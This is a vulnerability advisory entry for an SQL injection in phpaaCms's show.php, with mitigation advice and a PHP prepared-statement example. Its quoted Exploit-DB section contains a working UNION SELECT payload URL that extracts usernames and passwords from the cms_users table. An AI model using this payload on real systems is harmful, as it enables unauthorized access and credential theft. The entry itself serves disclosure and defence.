Vendor: phpaaCms
By: Unknown
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: phpaaCms
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7
Year: 2010

phpaaCms (show.php?id=) SQL injection Vulnerable

The phpaaCms application is vulnerable to SQL injection through the 'id' parameter of the 'show.php' page. Because the parameter value is used directly in a database query, an attacker can inject SQL through it and potentially read or modify data in the database without authorization.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize and validate user input before using it in SQL queries. Additionally, the use of prepared statements or parameterized queries is recommended.
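As an added illustration of that mitigation (this is not phpaaCms code; the table and column names cms_content, id, title and body are assumptions), the following contrasts the query shape the advisory describes, where show.php drops $_GET['id'] straight into SQL, with a hardened version that validates the type and binds the value as a parameter:

```php
<?php
// Added example, not from phpaaCms. Table/column names are assumptions.

// Vulnerable shape: the statement text is built from user input, so a
// crafted 'id' value changes the SQL instead of only the compared value.
function buildShowQueryUnsafe(string $id): string
{
    return "SELECT id, title, body FROM cms_content WHERE id=" . $id;
}

// Hardened: validate the type first, then bind the value as a parameter so
// the database engine never parses the user's input as SQL.
function fetchContentSafe(PDO $db, $rawId): ?array
{
    // show.php?id= should only ever carry a positive integer.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // reject rather than try to "clean" the input
    }
    $stmt = $db->prepare('SELECT id, title, body FROM cms_content WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Demonstration against an in-memory SQLite database with constructed data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cms_content (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec("INSERT INTO cms_content VALUES (1, 'Hello', 'First article')");

foreach (['1', '1 OR 1=1'] as $input) {   // constructed inputs: one valid, one not
    echo "input '$input' -> unsafe query text: " . buildShowQueryUnsafe($input) . PHP_EOL;
    $row = fetchContentSafe($db, $input);
    echo $row === null
        ? "  hardened handler: rejected non-integer id" . PHP_EOL
        : "  hardened handler: fetched '{$row['title']}'" . PHP_EOL;
}
```

The second input shows the difference: the unsafe builder happily emits an altered statement, while the hardened handler refuses the value before it reaches the database.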

Exploit-DB raw data:

#Exploit Title: phpaaCms (show.php?id=) SQL injection Vulnerable
# Software http://www.phpaa.cn
# Tested on: win 7
# category: webapp
# Code : n/a
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
 MWUHH TO Bl00dMafia: KashmiriMafia, Mirpuri, Mirzatun: gula, Boby, Mota & aSIM^JARRAL
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
----- [ Founder ] -----
 
    Shafiq-Ur-rehman
 
----- [ Email] -----
 
    aol.shafiq@gmail.com
 
 
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
 {{{{TITLE}}}
 
PHPAA (show.php) Sql injection Vulnerable
 
+++++[ Vendor ]+++++
 
http://www.phpaa.cn
 
                                                        
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 
----- [ SQL Injection ] -----
 
Put [SQL CODE]
 
[Link] http://server/phpaaCMS/show.php?id=1[SQL CODE]
 


             {Tested On}
 
----- [ Live Link (s) ] -----
 
[SQLi] http://<server>/show.php?id=1[CODE]
 
[SQLI] http://server/phpaaCMS/show.php?id=-194 union all select 1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users--
 

 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Thanks To All: www.Exploit-db.com | Ksecurity-team Members| 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-muwhhh>>> http://www.sql-injection-tools.blogspot.com
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     >>Live Long Pakistan<<
 
>>> Live Long Azad Kashmir<<<
 
>>> Proud To Be A Kashmiri+Pakistani<<<
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Bug discovered : 4 July 2010